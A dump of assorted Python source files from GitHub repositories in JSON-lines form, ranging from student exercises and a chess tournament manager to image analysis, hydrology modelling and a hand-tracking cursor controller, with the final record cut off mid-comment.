print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], wordfre[oldlistfile[i]][-2][1], 'MATCH 2'))\n print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], wordfre[oldlistfile[i]][-3][1], 'MATCH 3')) ","repo_name":"sriyuthsagi/CSCI-1100-Computer-Science-I","sub_path":"Homework/Homework 7/hw7Part1.py","file_name":"hw7Part1.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40264989209","text":"\"\"\"Main module for the streamlit app\"\"\"\nimport streamlit as st\nimport pages.welcome\nimport pages.tagger\nimport pages.insert\nimport pages.feedback\nimport pages.training\nimport pages.load_logs\nfrom utils import load_css, reset\n\nPAGES = {\n \"Welcome\": pages.welcome,\n \"Log Tagger\": pages.tagger,\n \"Train Feedback\": pages.feedback,\n \"Create New Log\": pages.insert,\n \"Trained Exception\": pages.training,\n \"Load Logs\": pages.load_logs,\n}\n\n\ndef main():\n st.set_page_config(page_title=\"Ernst & Young - Tagler: Smart Exception Tagger and Healer\",page_icon=\"⚠️\",layout=\"wide\")\n load_css(\"./css/my.css\") \n #st.write('
Tagler
', unsafe_allow_html=True)\n st.sidebar.image(\"./images/favicon.png\", width=100)\n st.sidebar.title(\"Navigation\")\n selection = st.sidebar.radio(\"Go to\", list(PAGES.keys()))\n\n r = st.sidebar.button(\"Reset\")\n page = PAGES[selection]\n page.write()\n\n if(r):\n reset()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ankitshaw/Tagler","sub_path":"frontend/tagler/web_app.py","file_name":"web_app.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74716482407","text":"#DADO EL MONTO DE COMPRA DE UN CLIENTE\n#si LA COMPRA es MAYOR A #10000 DESCONTAR 5%\n#si la compra es mayor a 15000 descontar 10%\n#si la compra es mayor a 50000 descontar un 20%\n#si la compra es mayor a 100000 descontar un 30%\n# MOSTRAR AL FINAL EL MONTO TOTAL Y EL DESCUENTO REALIZADO\n\ncompra = float(input(\"Ingrese el valor de la compra: $\"))\ncompra_inicial = compra\n\nif (compra > 100000):\n descuento = compra * 0.3\n compra = compra - (descuento)\nelif (compra > 50000):\n descuento = compra * 0.2\n compra = compra - (descuento)\nelif (compra > 15000):\n descuento = compra * 0.1\n compra = compra - (descuento)\nelif (compra > 10000):\n descuento = compra * 0.05\n compra = compra - (descuento)\nelse:\n descuento = 0\n\nprint(f\"Monto inicial: ${compra_inicial}\")\nprint(f\"Descuento: ${round(descuento, 2)}\")\nprint(f\"Monto final: ${round(compra, 2)}\")\n","repo_name":"AlexisRmnk/practicaInformatorio2022","sub_path":"prog_web/01_python/practicas_01_informatorio/notas_clases_online/clase04.py","file_name":"clase04.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74513116646","text":"# Import the pandas library\nimport pandas as pd\nimport matplotlib as plt\n\n# # Save the data from data/acts_sections.csv to a variable\n# df = pd.read_csv('data/acts_sections.csv')\n\n# Read the data from data/custom/cases_2018_criminal.csv \ndf = pd.read_csv('data/custom/cases_2018_criminal.csv')\n\n# Save the data from data/custom/women_acts.csv to a variable\nacts = pd.read_csv('data/custom/women_acts.csv')\n\n# Save the data from data/custom/women_sections.csv to a variable\nsections = pd.read_csv('data/custom/women_sections.csv')\n\n# Count the number of cases for which the \"act\" column matches any value in \"act\" column of acts OR \"section\" column matches any value in \"section\" column of sections\nm = df.act.isin(acts.act) | df.section.isin(sections.section)\ndf = df[m]\n\n# Save the result to a csv file\ndf.to_csv('data/custom/women_cases.csv', index=False)\n\n\n\n\n\n\n","repo_name":"AnirudhGovil/CourtCasesAnalysis","sub_path":"analysis/step6.py","file_name":"step6.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2682369852","text":"#!/usr/bin/python3\ndef safe_print_list(my_list=[], x = 0):\n new_list = []\n for count, item in enumerate(my_list):\n if count == x:\n break\n new_list.append(item)\n try:\n for x in new_list:\n print(\"{}\".format(x), end=\"\")\n print(\"\")\n if count < x:\n raise my_Error\n return x\n except:\n return count + 1\n","repo_name":"angelofgrace/holbertonschool-higher_level_programming","sub_path":"0x05-python-exceptions/0-safe_print_list.py","file_name":"0-safe_print_list.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14644622254","text":"import cv2\nimport sys\nimport os\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef readImage(filepath):\n return cv2.imread(filepath, cv2.IMREAD_COLOR)\n\ndef saveImage(filepath, image):\n cv2.imwrite(filepath, image)\n\ndef convertColors(image):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n _, thresh = cv2.threshold(image, 200, 255, 0)\n return thresh\n\ndef getContours(image):\n image = cv2.Canny(image, 0, 200) \n return np.where(image == 0, 255, 0)\n\ndef getImageProperties(image, gray_image):\n contours, _ = cv2.findContours(gray_image, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE) \n i = 0\n areas = np.zeros(len(contours) - 1)\n contours = contours[1:]\n contours.reverse()\n print(\"Número de regiões: \", len(contours), \"\\n\")\n for c in contours:\n # calculate moments for each contour\n M = cv2.moments(c)\n \n # calculate x,y coordinate of center\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n\n cv2.putText(image, str(i), (cX-4, cY+4), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 0), 0)\n # Area\n areas[i] = cv2.contourArea(c)\n # Perimeter\n perimeter = round(cv2.arcLength(c, True), 6)\n # Eccentricity\n a1 = (M['mu20']+M['mu02'])/2\n a2 = np.sqrt(4*M['mu11']**2+(M['mu20']-M['mu02'])**2)/2\n minor_axis = a1-a2\n major_axis = a1+a2\n eccentricity = round(np.sqrt(1-minor_axis/major_axis), 6)\n # Solidity\n hull = cv2.convexHull(c)\n hull_area = cv2.contourArea(hull)\n solidity = round(float(areas[i])/hull_area, 6)\n\n print(\"Região\", str(i) + \":\", \"área:\", areas[i], \"perímetro:\", perimeter, \"excentricidade:\", eccentricity, \"solidez:\", solidity)\n i = i + 1\n return (image, areas)\n\ndef getAreasHistogram(areas, filepath):\n areasNumber = np.zeros(3)\n areasNumber[0] = len(areas[areas < 1500])\n areasNumber[1] = len([a for a in areas if a >= 1500 and a < 3000])\n areasNumber[2] = len(areas[areas >= 3000])\n print(\"Número de regiões pequenas:\", int(areasNumber[0]))\n print(\"Número de regiões médias:\", int(areasNumber[1]))\n print(\"Número de regiões grandes:\", int(areasNumber[2]))\n\n plt.title('Histograma de áreas dos objetos')\n plt.xlabel('Área')\n plt.ylabel('Número de Objetos')\n plt.hist(areas, bins=3)\n plt.savefig(filepath)\n\nif __name__ == '__main__':\n in_file = sys.argv[1]\n out_file = sys.argv[2]\n out_path = os.path.dirname(os.path.realpath(__file__)) + \"/out/\" + out_file + \"/\"\n if not os.path.exists(\"./out/\"):\n os.makedirs(\"./out/\")\n if not os.path.exists(out_path):\n os.makedirs(out_path)\n\n image = readImage(in_file)\n\n gray_image = convertColors(image)\n saveImage(out_path + out_file + \"_1.png\", gray_image)\n\n edged_image = getContours(gray_image)\n saveImage(out_path + out_file + \"_2.png\", edged_image)\n\n (image, areas) = getImageProperties(image, gray_image)\n saveImage(out_path + out_file + \"_3.png\", image)\n\n getAreasHistogram(areas, out_path + out_file + \"_4.png\")","repo_name":"Fabio-Ricci/unicamp","sub_path":"mc920/trab3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38317491123","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nAstrorec paper recommendation engine\n\"\"\"\n\nimport os\nimport argparse\n\nfrom astrorec.latexrec import LaTeXRecommender\nfrom astrorec.arxivrec import ArXivRecommender\n\nfrom starlit.bib.adscache import ADSCacheDB\nfrom starlit.bib.adsdb import ADSBibDB\n\n\ndef main():\n args = parse_args()\n\n cachedb = ADSCacheDB(host='localhost',\n port=27017,\n ads_db=ADSBibDB())\n\n if os.path.exists(args.input_token):\n # assume it's a latex file\n rec = LaTeXRecommender(args.input_token, ads_cache=cachedb)\n else:\n # assume it's an arXiv ID. Could also be a ADS bibcode eventually\n rec = ArXivRecommender(args.input_token)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('input_token',\n help='arxiv ID or path to latex manuscript')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"freelanceastro/astrorec","sub_path":"scripts/astrorecs.py","file_name":"astrorecs.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"13659175787","text":"import pygame\r\nimport config\r\n\r\n\r\nclass Bullet(pygame.sprite.Sprite):\r\n\r\n def __init__(self, owner, player, enemy):\r\n super(Bullet, self).__init__()\r\n\r\n # Who shot the bullet\r\n self.owner = owner\r\n\r\n # Reference to the player\r\n self.player = player\r\n\r\n # Reference to the enemy\r\n self.enemy = enemy\r\n\r\n # Positional Properties\r\n self.radius = 5\r\n self.x = owner.x\r\n self.y = owner.y\r\n\r\n # Horizontal Velocity\r\n self.dx = 0\r\n\r\n if owner == player:\r\n\r\n # Vertical Velocity\r\n self.dy = -20\r\n self.owner = 1\r\n\r\n elif owner == enemy:\r\n\r\n # Vertical Velocity\r\n self.dy = 20\r\n self.owner = 2\r\n\r\n def update(self):\r\n\r\n # Apply Transforms\r\n self.y += self.dy\r\n\r\n # Render onto screen\r\n\r\n pygame.draw.circle(config.window, (255, 255, 255), (self.x, self.y), self.radius)\r\n\r\n # Check if out of bounds\r\n self.check_life_span()\r\n\r\n # Check for collisions\r\n self.check_collision()\r\n\r\n def check_collision(self):\r\n\r\n # Check if collided with enemy\r\n if self.owner == 1:\r\n if abs(self.y - self.enemy.y) <= self.enemy.radius:\r\n if abs(self.x - self.enemy.x) <= self.enemy.radius:\r\n self.enemy.collided = True\r\n self.enemy.hp -= 10\r\n self.kill()\r\n\r\n # Check if collided with player\r\n if self.owner == 2:\r\n\r\n if abs(self.y - self.player.y) <= self.player.radius:\r\n if abs(self.x - self.player.x) <= self.player.radius:\r\n self.player.collided = True\r\n self.player.hp -= 10\r\n self.kill()\r\n\r\n def check_life_span(self):\r\n\r\n # Basic Bounds Checking\r\n if self.y < 150:\r\n self.kill()\r\n\r\n if self.y > 650:\r\n self.kill()\r\n","repo_name":"robrose455/RL_Shootout","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31796858557","text":"from sklearn.model_selection import GridSearchCV\n\nparam_grid = {'learning_rate': [0.001, 0.01, 0.1], 'max_depth': [2, 4, 6, 8]} # Choose the parameters I want to tune and what values to try\n\ngrid = GridSearchCV(GradientBoostingClassifier(n_estimators=40), # setting n_estimators low to make it go a bit faster\n param_grid=param_grid, # Our search space - 4 * 3 = 12 models\n n_jobs=4, # Simple parallelization\n verbose=1, # Get some text output\n scoring='roc_auc') # What scoring function to use to compare models\n\ngrid.fit(train_x, train_y) # Train all combinations of parameters\n\nprint(f\"Best score: {grid.best_score_:.3f}\") # Get the score of the best-scoring model\nprint(f\"Best params: {grid.best_params_}\") # Get the params of the best-scoring model\npd.DataFrame(grid.cv_results_).sort_values(by='rank_test_score') # Pretty print our results\n","repo_name":"andersbogsnes/sklearn_tutorial","sub_path":"snippets/gridsearch.py","file_name":"gridsearch.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40906583841","text":"from helpers import get_rank\n\nfrom views.base import View\n\nfrom controllers.player import PlayerController\nfrom controllers.tournament import TournamentController\nfrom models.Player import player_database\n\n\nclass MenuController:\n def __init__(self):\n self.view = View()\n\n self.player = PlayerController()\n self.tournament = TournamentController()\n\n def report_menu(self):\n all_players = self.player.get_all_players()\n all_tournaments = self.tournament.get_all_tournaments()\n while True:\n option = self.view.select_report_menu()\n if option == '1':\n all_players = sorted(all_players, key=lambda x: (x['last_name'], x['first_name']))\n self.view.players_list(all_players)\n elif option == '2':\n all_players.sort(key=get_rank)\n self.view.players_list(all_players)\n elif option == '3':\n tournament_id = self.view.select_tournament(all_tournaments)\n tournament_players = self.tournament.get_one_tournament_players(tournament_id)\n tournament_players = sorted(all_players, key=lambda x: (x['last_name'], x['first_name']))\n self.view.players_list(tournament_players)\n elif option == '4':\n tournament_id = self.view.select_tournament(all_tournaments)\n tournament_players = self.tournament.get_one_tournament_players(tournament_id)\n tournament_players.sort(key=get_rank)\n self.view.players_list(tournament_players)\n elif option == '5':\n self.view.tournaments_list(all_tournaments)\n elif option == '6':\n tournament_id = self.view.select_tournament(all_tournaments)\n tournament_rounds = self.tournament.get_one_tournament_rounds(tournament_id)\n self.view.rounds_list(tournament_rounds)\n elif option == '7':\n tournament_id = self.view.select_tournament(all_tournaments)\n tournament_rounds = self.tournament.get_one_tournament_rounds(tournament_id)\n self.view.matches_list(tournament_rounds)\n elif option == '0':\n break\n\n def main_menu(self):\n while True:\n option = self.view.select_main_menu()\n if option == '1':\n self.tournament.create_tournament()\n elif option == '2':\n self.tournament_menu()\n elif option == '3':\n self.player.create_player()\n elif option == '4':\n all_players = self.player.get_all_players()\n player_id = self.view.select_player(all_players)\n player_id = int(player_id)\n ranking = self.view.rank_from()\n self.player.update_one_player_rank(player_id, ranking)\n elif option == '5':\n self.report_menu()\n elif option == '0':\n break\n\n def match_menu(self, tournament_id):\n while True:\n tournament = self.tournament.get_one_tournament(tournament_id)\n tournament_rounds_number = tournament['rounds_number']\n tournament_id = tournament.doc_id\n round_index = tournament['round_index']\n match_index = tournament['match_index']\n players_id = tournament['players']\n round_counter = round_index + 1\n players = []\n\n if match_index == 4:\n self.tournament.update_one_tournament_round_end_time(tournament_id, round_index)\n self.tournament.update_one_tournament_round_index(tournament_id)\n self.tournament.reset_one_tournament_match_index(tournament_id)\n tournament = self.tournament.get_one_tournament(tournament_id)\n round_index = tournament['round_index']\n match_index = tournament['match_index']\n round_counter = round_counter + 1\n\n if round_counter <= tournament_rounds_number:\n if match_index == 0:\n for player_id in players_id:\n players.append(player_database.get(doc_id=player_id))\n\n matches = self.tournament.create_tournament_rounds_matches(\n players,\n round_counter,\n tournament_id)\n for match in matches:\n player_1 = match[0][0]\n player_2 = match[1][0]\n self.player.update_one_player_opponents(player_1, player_2)\n self.player.update_one_player_opponents(player_2, player_1)\n\n self.tournament.create_tournament_round(tournament_id, round_counter, matches)\n else:\n round_index = round_index - 1\n self.tournament.update_one_tournament_round_end_time(tournament_id, round_index)\n self.tournament.reset_one_tournament_match_index(tournament_id)\n break\n elif match_index == 0:\n for player_id in players_id:\n players.append(player_database.get(doc_id=player_id))\n\n matches = self.tournament.create_tournament_rounds_matches(players, round_counter, tournament_id)\n for match in matches:\n player_1 = match[0][0]\n player_2 = match[1][0]\n self.player.update_one_player_opponents(player_1, player_2)\n self.player.update_one_player_opponents(player_2, player_1)\n\n self.tournament.create_tournament_round(tournament_id, round_counter, matches)\n\n match = self.tournament.get_one_tournament_match(tournament_id, round_index, match_index)\n option = self.view.select_match_menu(match)\n if option == '1':\n self.tournament.update_score(tournament, match)\n elif option == '0':\n break\n\n def tournament_menu(self):\n all_tournaments = self.tournament.get_all_tournaments()\n\n while True:\n option = self.view.select_tournament(all_tournaments)\n if option == '0':\n break\n else:\n tournament_id = option\n tournament_id = int(tournament_id)\n tournament = self.tournament.get_one_tournament(tournament_id)\n\n while True:\n option = self.view.select_tournament_menu(tournament)\n if option == '1':\n self.match_menu(tournament.doc_id)\n if option == '2':\n self.select_player_menu(tournament)\n elif option == '0':\n break\n\n def select_player_menu(self, tournament):\n all_players = self.player.get_all_players()\n tournament_id = tournament.doc_id\n\n while True:\n option = self.view.select_player(all_players)\n if option == '0':\n break\n else:\n player_id = option\n player_id = int(player_id)\n\n self.tournament.update_one_tournament_players(tournament_id, player_id)\n","repo_name":"For4llx/chess_management","sub_path":"controllers/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":7343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36851949592","text":"from utils import (\n Base,\n engine,\n PageParser,\n add_stage_name,\n db_notempty\n\n)\nfrom telegram_bot import bot\nfrom core import USER_STAGES, PARSE_URLS\nimport logging\n\n\ndef main():\n # Создание базы данных\n Base.metadata.create_all(engine)\n\n # Создание лога\n logging.basicConfig(filename=\"./logs/app_log.log\", filemode=\"w\",\n format=\"%(asctime)s %(levelname)s %(message)s\")\n logging.captureWarnings(True)\n\n # Если в базе нет записей\n if not db_notempty():\n parser = PageParser()\n\n # Парсим все сайты\n for url in PARSE_URLS:\n parser.parse_site(url)\n\n # Пишем в базу все \"стадии\" пользователя в боте\n logging.info('Writing app stage names')\n for stage in USER_STAGES:\n add_stage_name(stage)\n\n logging.info('Data created!')\n\n bot.polling(none_stop=True, interval=0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"oilgo/toastbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18527376279","text":"from __future__ import absolute_import, print_function\n\nfrom ..global_modules.add1 import loadmap, readnetcdf\nfrom ..global_modules.settings import LisSettings\nfrom . import HydroModule\n\n\nclass landusechange(HydroModule):\n\n \"\"\"\n # ************************************************************\n # ***** LAND USE CHANGE : FRACTION MAPS **********************\n # ************************************************************\n\n # Each pixel is divided into several fractions, adding up to 1\n # open water\n # forest\n # sealed fraction\n # irrigated areas\n # rice irrigation areas\n # other\n \"\"\"\n input_files_keys = {'all': ['ForestFraction', 'DirectRunoffFraction', 'WaterFraction',\n 'IrrigationFraction', 'RiceFraction', 'OtherFraction'],\n 'TransientLandUseChange': ['ForestFractionMaps', 'DirectRunoffFractionMaps', 'WaterFractionMaps',\n 'IrrigationFractionMaps', 'RiceFractionMaps', 'OtherFractionMaps']}\n module_name = 'LandUseChange'\n\n def __init__(self, landusechange_variable):\n self.var = landusechange_variable\n\n# --------------------------------------------------------------------------\n# --------------------------------------------------------------------------\n\n def initial(self):\n \"\"\" initial part of the landusechange module\n \"\"\"\n\n self.var.ForestFraction = loadmap('ForestFraction', timestampflag='closest').copy()\n self.var.DirectRunoffFraction = loadmap('DirectRunoffFraction', timestampflag='closest').copy()\n self.var.WaterFraction = loadmap('WaterFraction', timestampflag='closest').copy()\n self.var.IrrigationFraction = loadmap('IrrigationFraction', timestampflag='closest').copy()\n self.var.RiceFraction = loadmap('RiceFraction', timestampflag='closest').copy()\n self.var.OtherFraction = loadmap('OtherFraction', timestampflag='closest').copy()\n\n def dynamic(self):\n \"\"\"dynamic part of the landusechange module\n \"\"\"\n settings = LisSettings.instance()\n option = settings.options\n binding = settings.binding\n\n if option['TransientLandUseChange'] and option['readNetcdfStack']:\n self.var.ForestFraction = readnetcdf(binding['ForestFractionMaps'], self.var.currentTimeStep(), timestampflag='closest')\n self.var.DirectRunoffFraction = readnetcdf(binding['DirectRunoffFractionMaps'], self.var.currentTimeStep(), timestampflag='closest')\n self.var.WaterFraction = readnetcdf(binding['WaterFractionMaps'], self.var.currentTimeStep(), timestampflag='closest')\n self.var.IrrigationFraction = readnetcdf(binding['IrrigationFractionMaps'], self.var.currentTimeStep(), timestampflag='closest')\n self.var.RiceFraction = readnetcdf(binding['RiceFractionMaps'], self.var.currentTimeStep(), timestampflag='closest')\n self.var.OtherFraction = readnetcdf(binding['OtherFractionMaps'], self.var.currentTimeStep(), timestampflag='closest')\n\n self.var.Test = self.var.RiceFraction*1.0\n","repo_name":"hzeinivand/lisflood","sub_path":"src/lisflood/hydrological_modules/landusechange.py","file_name":"landusechange.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41497278252","text":"from hak.one.directory.filepaths.get import f as get_filepaths\nfrom hak.one.file.remove import f as remove_file\nfrom hak.one.file.save import f as save_file\nfrom hak.one.file.load import f as load_file\nfrom time import sleep\nfrom time import time\n\nfrom src.str.is_well_formed import f as filter\nfrom src.str.to_next_str import f as to_next_str\n\nget_t = lambda: int(time()/900)*900\n\nstring = load_file('latest.txt')\nlatest = string\nprint(f'string: {repr(string)}')\n\nwhile True:\n filepaths = get_filepaths('./signal', [])\n print(time(), filepaths)\n print(f'string: {repr(string)}')\n t = get_t()\n with open(f'./output/out_{t}.txt', 'a') as _file:\n for _ in range(600000):\n string = to_next_str(string)\n if filter(string):\n latest = string\n _file.write('\\n'+latest)\n\n save_file('latest.txt', latest)\n \n if './signal/stop.signal' in filepaths:\n remove_file('./signal/stop.signal')\n break\n\nprint('fin')","repo_name":"JohnForbes/kolmogorov","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22382345444","text":"\nimport csv\nimport random\nimport time\n\nx_value = 0\ntotal_1 = 1000\ntotal_2 = 1000\n\nfieldnames = [\"x_value\", \"total_1\", \"total_2\"]\ndataFileName = 'dataGen.csv'\n\nwith open(dataFileName, 'w') as csv_file:\n csv_writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n csv_writer.writeheader()\n\nwhile True:\n\n with open(dataFileName, 'a') as csv_file:\n csv_writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n\n info = {\n \"x_value\": x_value,\n \"total_1\": total_1,\n \"total_2\": total_2\n }\n\n csv_writer.writerow(info)\n print(x_value, total_1, total_2)\n\n x_value += 1\n total_1 = total_1 + random.randint(-6, 8)\n total_2 = total_2 + random.randint(-5, 6)\n\n time.sleep(1)\n","repo_name":"Sansub471/DataVisualization","sub_path":"matplotlib/data_gen.py","file_name":"data_gen.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27160151178","text":"from lab7.Swarm import Swarm\n\n\ndef main_7(min, max, n, population, generations=100, strategy=1):\n # swarm = Swarm(-5.12, 5.12, 2, 10)\n swarm = Swarm(min, max, n, population, generations=generations, strategy_choice=strategy)\n swarm.start()\n print(swarm, '\\n')\n\n\nmain_7(-5.12, 5.12, 2, 10)\nmain_7(-5.12, 5.12, 3, 10)\nmain_7(-5.12, 5.12, 5, 10, generations=100)\nmain_7(-5.12, 5.12, 10, 10, generations=500)\n","repo_name":"MrBlueSkyFox/Evolution_1","sub_path":"lab7/main_7.py","file_name":"main_7.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39529863427","text":"#vending_machine.py\r\ngoods ={'A': {'가격':10, '재고':2},\r\n 'B': {'가격':5, '재고':3}}\r\nprompt = '''Whice one do you want in the above list? ...\r\n (Press Enter to quit)'''\r\nwhile True:\r\n 재고 = 0 \r\n for key, item in goods.items():\r\n 재고 += goods[key]['재고']\r\n print(f'{key} = {item}')\r\n if 재고 <=0:\r\n print(\"죄송하지만 재고가 없습니다!\")\r\n \r\n 상품 = input(prompt)\r\nif 상품 == '': # Enter key\r\n \r\n if 상품 not in goods.keys():\r\n print(\"\\n죄송하지만 그런 상품은 없어요!\\n\")\r\n \r\n 가격 = goods[상품]['가격']\r\n 재고 = goods[상품]['재고']\r\n if 재고 < 1:\r\n print('\\n다 떨어졌어요!\\n')\r\n \r\n 현금 = int(input(\"돈을 넣으세요: \"))\r\n 잔돈 = 현금 - 가격\r\n if 잔돈 >= 0:\r\n print(f'여기 상품 {상품}와 잔돈 {잔돈}원입니다.\\n')\r\n goods[상품]['재고'] = 재고 - 1\r\n else:\r\n print('\\n 현금이 모자라서 그대로 반환됩니다.\\n') \r\n","repo_name":"rangyi22/bwktim","sub_path":"python_for_student/vending_machine.py","file_name":"vending_machine.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18223158838","text":"from typing import List, Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def kthSmallest(self, root: Optional[TreeNode], k: int) -> int:\n traversal = []\n\n def inorder(node: Optional[TreeNode]):\n if not node:\n return\n if node.left:\n inorder(node.left)\n traversal.append(node.val)\n if node.right:\n inorder(node.right)\n return\n\n inorder(root)\n return traversal[k - 1]\n\n\ndef main():\n solution = Solution()\n tree = TreeNode(3)\n tree.left = TreeNode(1)\n tree.left.right = TreeNode(2)\n tree.right = TreeNode(4)\n print(solution.kthSmallest(tree, 1))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TheArcus02/LeetCodeSolutions","sub_path":"kth_smallest_bst.py","file_name":"kth_smallest_bst.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42105775041","text":"from random import random,gauss\n\nclass InvalidDataException(Exception):\n count=0\n def __init__(self, value):\n InvalidDataException.count+=1\n self.value = value\n def __str__(self):\n return repr(self.value)\n# @classmethod\n# def count(cls):\n# return cls.count\n\nclass ContData:\n def __init__(self,data):#speed,gspeed,stwa,belt)\n if data['speed'] is None and data['speed_GPS'] is None:\n raise InvalidDataException(data)\n return\n self.brake=data['brlt'];\n self.speed=data['speed_GPS'] or data['speed'] or 0\n self.gspeed=data['speed_GPS'];\n self.belt=data['belt'] or 0;\n self.stwa=data['stwa'] or 0;\n self.force=self.speed**2 * self.stwa\n self.ftgs=data['ftgs'];\n #print self.ftgs\n self.speed_lim=data['speed_lim'] or 250;\n #print self.speed, data['speed_GPS'], data['speed']\n self.vehicle_dist=gauss(self.speed/2+10,15);\n self.time = data['time']\n","repo_name":"yeganer/codeFEST_Tinder","sub_path":"ContData.py","file_name":"ContData.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7125582732","text":"\"\"\"Utility methods for HAC environments.\"\"\"\n\n\ndef check_validity(model_name,\n initial_state_space,\n max_actions,\n timesteps_per_action):\n \"\"\"Ensure environment configurations were properly entered.\n\n This is done via a sequence of assertions.\n\n Parameters\n ----------\n model_name : str\n name of the Mujoco model file\n initial_state_space : list of (float, float)\n bounds for the initial values for all elements in the state space.\n This is achieved during the reset procedure.\n max_actions : int\n maximum number of atomic actions. This will typically be\n flags.time_scale**(flags.layers).\n timesteps_per_action : int\n number of time steps per atomic action\n \"\"\"\n # Ensure model file is an \".xml\" file\n assert model_name[-4:] == \".xml\", \"Mujoco model must be an \\\".xml\\\" file\"\n\n for i in range(len(initial_state_space)):\n assert initial_state_space[i][1] >= initial_state_space[i][0], \\\n \"In initial state space, upper bound must be >= lower bound\"\n\n # Ensure max action and timesteps_per_action are positive integers\n assert max_actions > 0, \"Max actions should be a positive integer\"\n\n assert timesteps_per_action > 0, \\\n \"Timesteps per action should be a positive integer\"\n","repo_name":"AboudyKreidieh/h-baselines","sub_path":"hbaselines/envs/hac/env_utils.py","file_name":"env_utils.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"53"} +{"seq_id":"4220156774","text":"import cv2\r\nimport mediapipe as mp\r\nimport pyautogui\r\n\r\n\r\nmp_hands = mp.solutions.hands\r\nhands = mp_hands.Hands(static_image_mode=False, max_num_hands=1, min_detection_confidence=0.5, min_tracking_confidence=0.5)\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nif not cap.isOpened():\r\n print(\"Failed to open the camera\")\r\n exit()\r\n\r\nscreen_width, screen_height = pyautogui.size()\r\n\r\nwhile True:\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n\r\n flipped_frame = cv2.flip(frame, 1)\r\n frame_rgb = cv2.cvtColor(flipped_frame, cv2.COLOR_BGR2RGB)\r\n\r\n results = hands.process(frame_rgb)\r\n\r\n if results.multi_hand_landmarks:\r\n hand_landmarks = results.multi_hand_landmarks[0]\r\n\r\n index_finger_tip = hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP]\r\n index_finger_x = int(index_finger_tip.x * screen_width)\r\n index_finger_y = int(index_finger_tip.y * screen_height)\r\n\r\n pyautogui.moveTo(index_finger_x, index_finger_y)\r\n\r\n cv2.imshow(\"Camera\", flipped_frame)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"alexandre879/Crosshair-controller","sub_path":"crosshair_controller.py","file_name":"crosshair_controller.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27373462902","text":"# Creates a series of polygon outlines representing spatial scenarios, by clipping out a series of constraints\n# Designed to create housing development zone scenarios\n# Reads constraint layer names from a table\n# Erases each constraint from the starting layer, converts to single part, removes areas less than threshold size,\n# dissolves again, adds a 